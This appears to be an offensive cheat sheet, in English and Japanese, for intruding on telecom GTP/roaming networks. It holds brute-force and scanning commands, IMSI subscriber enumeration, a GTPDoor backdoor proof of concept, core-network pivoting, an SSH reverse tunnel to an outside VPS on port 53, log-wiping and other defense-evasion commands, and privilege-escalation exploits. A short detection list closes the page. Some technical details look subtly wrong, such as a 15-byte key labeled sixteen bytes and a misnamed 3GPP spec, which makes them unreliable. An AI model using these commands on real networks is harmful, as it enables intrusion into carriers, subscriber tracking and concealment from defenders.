Telecom Network Exploitation (GTP / Roaming Environments)

Reading time: 9 minutes

1. Recon & Initial Access

1.1 Default OSS / NE Accounts

驚くほど多くのベンダーネットワーク要素は、root:admin、dbadmin:dbadmin、cacti:cacti、ftpuser:ftpuserなどのハードコーディングされたSSH/Telnetユーザーと共に出荷されます。 専用のワードリストはブルートフォースの成功率を大幅に向上させます:

hydra -L usernames.txt -P vendor_telecom_defaults.txt ssh://10.10.10.10 -t 8 -o found.txt

デバイスが管理VRFのみを公開している場合は、最初にジャンプホストを介してピボットします（下の「SGSN Emu Tunnel」セクションを参照）。

1.2 GRX/IPX内のホスト発見

ほとんどのGRXオペレーターは、バックボーン全体でICMPエコーを許可しています。 masscanを組み合わせて、組み込みのgtpv1 UDPプローブを使用して、GTP-Cリスナーを迅速にマッピングします：

masscan 10.0.0.0/8 -pU:2123 --rate 50000 --router-ip 10.0.0.254 --router-mac 00:11:22:33:44:55

2. サブスクライバーの列挙 – cordscan

以下のGoツールは、GTP-C Create PDP Context Requestパケットを作成し、応答をログに記録します。各応答は、クエリされたIMSIにサービスを提供している現在のSGSN / MMEを明らかにし、時にはサブスクライバーの訪問したPLMNも示します。

# Build
GOOS=linux GOARCH=amd64 go build -o cordscan ./cmd/cordscan

# Usage (typical):
./cordscan --imsi 404995112345678 --oper 40499 -w out.pcap

重要なフラグ：

• --imsi 対象の加入者IMSI
• --oper ホーム / HNI (MCC+MNC)
• -w 生のパケットをpcapに書き込む

バイナリ内の重要な定数は、スキャンを拡大するためにパッチを当てることができます：

pingtimeout       = 3   // seconds before giving up
pco               = 0x218080
common_tcp_ports  = "22,23,80,443,8080"

3. コード実行 over GTP – GTPDoor

GTPDoor は、UDP 2123 にバインドし、すべての受信 GTP-C パケットを解析する小さな ELF サービスです。ペイロードが事前共有タグで始まると、残りは復号化され（AES-128-CBC）、/bin/sh -c を介して実行されます。stdout/stderr は Echo Response メッセージ内に外部セッションが作成されないように流出されます。

最小限の PoC パケット (Python):

import gtpc, Crypto.Cipher.AES as AES
key = b"SixteenByteKey!"
cmd = b"id;uname -a"
enc = AES.new(key, AES.MODE_CBC, iv=b"\x00"*16).encrypt(cmd.ljust(32,b"\x00"))
print(gtpc.build_echo_req(tag=b"MAG1C", blob=enc))

検出:

• 不均衡なエコーリクエストをSGSN IPに送信するホスト
• メッセージタイプ = 1 (エコー) のときにGTPバージョンフラグが1に設定されている – 仕様からの逸脱

4. コアを通じたピボット

4.1 sgsnemu + SOCKS5

OsmoGGSNは、実際のGGSN/PGWに向けてPDPコンテキストを確立することができるSGSNエミュレーターを出荷します。交渉が完了すると、Linuxはローミングピアから到達可能な新しいtun0インターフェースを受け取ります。

sgsnemu -g 10.1.1.100 -i 10.1.1.10 -m 40499 -s 404995112345678 \
-APN internet -c 1 -d
ip route add 172.16.0.0/12 dev tun0
microsocks -p 1080 &   # internal SOCKS proxy

適切なファイアウォールのヘアピンを使用することで、このトンネルはシグナリング専用VLANをバイパスし、直接データプレーンに到達します。

4.2 ポート53経由のSSHリバーストンネル

DNSは、ローミングインフラストラクチャではほぼ常にオープンです。内部SSHサービスをVPSに公開し、:53でリッスンし、後で自宅から戻ります：

ssh -f -N -R 0.0.0.0:53:127.0.0.1:22 user@vps.example.com

GatewayPorts yesがVPSで有効になっていることを確認してください。

5. 隠れたチャネル

すべてのインプラントは、タイムスタンプを変更し、クラッシュした場合は再生成するウォッチドッグを実装しています。

6. 防御回避チートシート

# Remove attacker IPs from wtmp
utmpdump /var/log/wtmp | sed '/203\.0\.113\.66/d' | utmpdump -r > /tmp/clean && mv /tmp/clean /var/log/wtmp

# Disable bash history
export HISTFILE=/dev/null

# Masquerade as kernel thread
echo 0 > /proc/$$/autogroup   # hide from top/htop
printf '\0' > /proc/$$/comm    # appears as [kworker/1]

touch -r /usr/bin/time /usr/bin/chargen   # timestomp
setenforce 0                              # disable SELinux

7. レガシーNEにおける特権昇格

# DirtyCow – CVE-2016-5195
gcc -pthread dirty.c -o dirty && ./dirty /etc/passwd

# PwnKit – CVE-2021-4034
python3 PwnKit.py

# Sudo Baron Samedit – CVE-2021-3156
python3 exploit_userspec.py

クリーンアップのヒント:

userdel firefart 2>/dev/null
rm -f /tmp/sh ; history -c

8. ツールボックス

• cordscan, GTPDoor, EchoBackdoor, NoDepDNS – 前のセクションで説明されたカスタムツール。
• FScan : intranet TCP スイープ (fscan -p 22,80,443 10.0.0.0/24)
• Responder : LLMNR/NBT-NS ローグ WPAD
• Microsocks + ProxyChains : 軽量な SOCKS5 ピボット
• FRP (≥0.37) : NAT トラバーサル / アセットブリッジング

検出アイデア

1. SGSN/GGSN 以外のデバイスが Create PDP Context Requests を確立すること。
2. 内部 IP からの SSH ハンドシェイクを受信する非標準ポート (53, 80, 443)。
3. 対応する Echo Response なしの頻繁な Echo Requests – GTPDoor ビーコンを示す可能性があります。
4. 大きく、ゼロ以外の識別子/シーケンスフィールドを持つ ICMP エコー応答トラフィックの高いレート。

参考文献

• Palo Alto Unit42 – グローバル通信ネットワークの侵入
• 3GPP TS 29.060 – GPRS トンネリングプロトコル (v16.4.0)
• 3GPP TS 29.281 – GTPv2-C (v17.6.0)